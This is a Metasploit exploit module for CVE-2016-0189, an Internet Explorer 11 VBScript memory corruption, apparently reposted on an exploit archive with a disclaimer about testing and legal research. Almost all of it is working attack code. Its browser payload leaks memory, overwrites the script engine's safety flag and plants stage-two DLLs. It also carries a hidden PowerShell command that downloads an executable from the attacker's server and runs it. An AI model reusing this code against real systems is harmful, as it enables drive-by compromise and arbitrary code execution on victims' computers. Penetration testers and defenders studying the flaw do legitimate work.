Internet Explorer 11 VBScript Engine Memory Corruption##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Internet Explorer 11 VBScript Engine Memory Corruption",
'Description' => %q{
This module exploits the memory corruption vulnerability (CVE-2016-0189)
present in the VBScript engine of Internet Explorer 11.
},
'License' => MSF_LICENSE,
'Author' => [
'Theori', # Original RE research and exploitation
'William Webb <william_webb[at]rapid7.com>' # Metasploit module
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows 10 with IE 11', { } ]
],
'References' =>
[
[ 'CVE', '2016-0189' ],
[ 'MSB', 'MS16-051' ]
],
'Arch' => ARCH_X86_64,
'DisclosureDate' => "May 10 2016",
'DefaultTarget' => 0))
end
def setup
# @stage2html = Rex::Text.rand_text_alphanum(6)
@ieshell = "#{Rex::Text.rand_text_alphanumeric(6)}" # ieshell32.dll uri
@localsrv = "#{Rex::Text.rand_text_alphanumeric(6)}" # ielocalserver.dll uri
@pm_escape_html = "#{Rex::Text.rand_text_alphanumeric(6)}" # vbscipt_godmode.html
@payload_uri = "#{Rex::Text.rand_text_alphanumeric(8)}"
@payload_exe = "#{Rex::Text.rand_text_alpha(6)}.exe"
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
super
end
def exploit_html(req_uri)
srvhost = datastore['SRVHOST']
srvport = datastore['SRVPORT']
template = <<-EOF
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<script type="text/vbscript">
Dim downloadFiles
Dim cacheRegex
Dim cacheFiles(3)
Dim downloadState
Dim pinTime
Dim oFSO
Dim oWS
Dim shell
function FindFile(path, regexFile)
FindFile = ""
For Each f in oFSO.GetFolder(path).Files
If regexFile.Test(f.Name) Then
FindFile = f.Name
Exit For
End If
Next
end function
function SearchCache(path, regexFile)
SearchCache = ""
For Each fld in oFSO.GetFolder(path).SubFolders
'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
filename = FindFile(path & "" & fld.Name, regexFile)
If filename <> "" Then
SearchCache = path & "" & fld.Name & "" & filename
Exit For
End If
'End If
Next
end function
function loaddll()
On Error Resume Next
Set wshSystemEnv = oWS.Environment("Process")
tmpDir = oFSO.GetSpecialFolder(2)
tmpSysDir = tmpDir & "System32"
tmpShellFile = tmpSysDir & "shell32.dll"
oFSO.CreateFolder(tmpSysDir)
oFSO.MoveFile cacheFiles(0), tmpShellFile
mydllFile = tmpDir & "" & downloadFiles(1)
oFSO.MoveFile cacheFiles(1), mydllFile
wshSystemEnv("MyDllPath") = mydllFile
If (UBound(downloadFiles) = 2) Then
stage2File = tmpDir & "#{@pm_escape_html}.html"
oFSO.MoveFile cacheFiles(2), stage2File
wshSystemEnv("stage2file") = stage2File
End If
saveRoot = wshSystemEnv("SystemRoot")
wshSystemEnv("SaveSystemRoot") = saveRoot
wshSystemEnv("SystemRoot") = tmpDir
Set shell = CreateObject("Shell.Application")
If (UBound(downloadFiles) = 2) Then
call tolocal()
End If
end function
Sub OnDownloadDone()
If InStr(userAgent, "NT 5.") > 0 Then
cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
cacheDir = cacheDir & "Local SettingsTemporary Internet FilesLowIE"
Else
cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowIE"
End If
Set regexFile = new regexp
regexFile.Pattern = cacheRegex(downloadState)
cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
If cacheFiles(downloadState) = "" Then
Exit Sub
End If
If downloadState = UBound(downloadFiles) Then
loaddll()
Else
downloadState = downloadState + 1
DoDownload()
End If
End Sub
Sub DoDownload()
pinTime = Now
call getdll(downloadFiles(downloadState))
End Sub
Sub runshell()
downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
cacheRegex = Array("^#{@ieshell}[d].dll$", "^#{@localsrv}[d].dll$", "^#{@pm_escape_html}[d].htm$")
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set oWS = CreateObject("WScript.Shell")
downloadState = 0
DoDownload()
End Sub
</script>
<script type="text/vbscript">
Dim bl
Dim plunge(32)
Dim y(32)
prefix = "%u4141%u4141"
d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
b = String(64000, "D")
c = d & b
x = UnEscape(c)
Class ArrayWrapper
Dim A
Private Sub Class_Initialize
ReDim Preserve AA(1, 2000)
A = AA
End Sub
Public Sub Resize()
ReDim Preserve A(1, 1)
End Sub
End Class
Class Spray
End Class
Function getAddr (arg1, s)
bl = Null
Set bl = New ArrayWrapper
For i = 0 To 32
Set plunge(i) = s
Next
Set bl.A(arg1, 2) = s
Dim addr
Dim i
For i = 0 To 31
If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
addr = strToInt(Mid(y(i), 3 + 4, 2))
End If
y(i) = Null
Next
If addr = Null Then
document.location.href = document.location.href
Return
End If
getAddr = addr
End Function
Function leakMem (arg1, addr)
d = prefix & "%u0008%u4141%u4141%u4141"
c = d & intToStr(addr) & b
x = UnEscape(c)
bl = Null
Set bl = New ArrayWrapper
Dim o
o = bl.A(arg1, 2)
leakMem = o
End Function
Sub overwrite (arg1, addr)
d = prefix & "%u400C%u0000%u0000%u0000"
c = d & intToStr(addr) & b
x = UnEscape(c)
bl = Null
Set bl = New ArrayWrapper
bl.A(arg1, 2) = CSng(0)
End Sub
Function exploit (arg1)
Dim addr
Dim csession
Dim olescript
Dim mem
Set sp = New Spray
addr = getAddr(arg1, sp)
mem = leakMem(arg1, addr + 8)
csession = strToInt(Mid(mem, 3, 2))
mem = leakMem(arg1, csession + 4)
olescript = strToInt(Mid(mem, 1, 2))
overwrite arg1, olescript + &H174
runshell()
End Function
Function triggerBug
bl.Resize()
Dim i
For i = 0 To 32
y(i) = Mid(x, 1, 24000)
Next
End Function
</script>
<script type="text/javascript">
var userAgent = navigator.userAgent;
var oReq;
function getdll(downloadFile)
{
oReq = new XMLHttpRequest();
oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
oReq.onreadystatechange = handler;
oReq.send();
}
function handler()
{
if (oReq.readyState == 4 && oReq.status == 200) {
OnDownloadDone();
}
}
function tolocal()
{
location.href = "http://localhost:5555/#{@pm_escape_html}.html";
}
function strToInt(s)
{
return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
}
function intToStr(x)
{
return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
}
var o;
o = {"valueOf": function () {
triggerBug();
return 1;
}};
setTimeout(function() {exploit(o);}, 50);
</script>
</body>
</html>
EOF
template
end
def stage2_html(req_uri)
template = <<-EOF
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<script type="text/vbscript">
Dim aw
Dim plunge(32)
Dim y(32)
prefix = "%u4141%u4141"
d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
b = String(64000, "D")
c = d & b
x = UnEscape(c)
Class ArrayWrapper
Dim A()
Private Sub Class_Initialize
ReDim Preserve A(1, 2000)
End Sub
Public Sub Resize()
ReDim Preserve A(1, 1)
End Sub
End Class
Class Dummy
End Class
Function getAddr (arg1, s)
aw = Null
Set aw = New ArrayWrapper
For i = 0 To 32
Set plunge(i) = s
Next
Set aw.A(arg1, 2) = s
Dim addr
Dim i
For i = 0 To 31
If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
addr = strToInt(Mid(y(i), 3 + 4, 2))
End If
y(i) = Null
Next
If addr = Null Then
document.location.href = document.location.href
Return
End If
getAddr = addr
End Function
Function leakMem (arg1, addr)
d = prefix & "%u0008%u4141%u4141%u4141"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
Dim o
o = aw.A(arg1, 2)
leakMem = o
End Function
Sub overwrite (arg1, addr)
d = prefix & "%u400C%u0000%u0000%u0000"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
aw.A(arg1, 2) = CSng(0)
End Sub
Function exploit (arg1)
Dim addr
Dim csession
Dim olescript
Dim mem
Set dm = New Dummy
addr = getAddr(arg1, dm)
mem = leakMem(arg1, addr + 8)
csession = strToInt(Mid(mem, 3, 2))
mem = leakMem(arg1, csession + 4)
olescript = strToInt(Mid(mem, 1, 2))
overwrite arg1, olescript + &H174
Set shObj = CreateObject("Wscript.shell")
shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
shObj.Run("%temp%#{@payload_exe}")
End Function
Function triggerBug
aw.Resize()
Dim i
For i = 0 To 32
y(i) = Mid(x, 1, 24000)
Next
End Function
</script>
<script type="text/javascript">
function strToInt(s)
{
return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
}
function intToStr(x)
{
return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
}
var o;
o = {"valueOf": function () {
triggerBug();
return 1;
}};
setTimeout(function() {exploit(o);}, 50);
</script>
</body>
</html>
EOF
template
end
def on_request_uri(cli, request)
# used for some debugging stuff
ies = @ieshell
ls = @localsrv
pm = @pm_escape_html
print_status("Received request: #{request.uri}")
if request.uri =~ /.*#{ies}.*$/
print_status("Sending stage two DLL ...")
send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
elsif request.uri =~ /.*#{ls}.*$/
print_status("Sending local server DLL ...")
send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
elsif request.uri =~ /.*#{pm}.*$/
rq = "#{get_resource.chomp('/')}"
gm = stage2_html(rq)
send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
elsif request.uri =~ /.*#{@payload_uri}$/
return if ((payload = regenerate_payload(cli)) == nil)
print_status("Sending payload ...")
send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
else
print_status("Sending main page ..")
send_response(cli, exploit_html(request.uri))
end
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum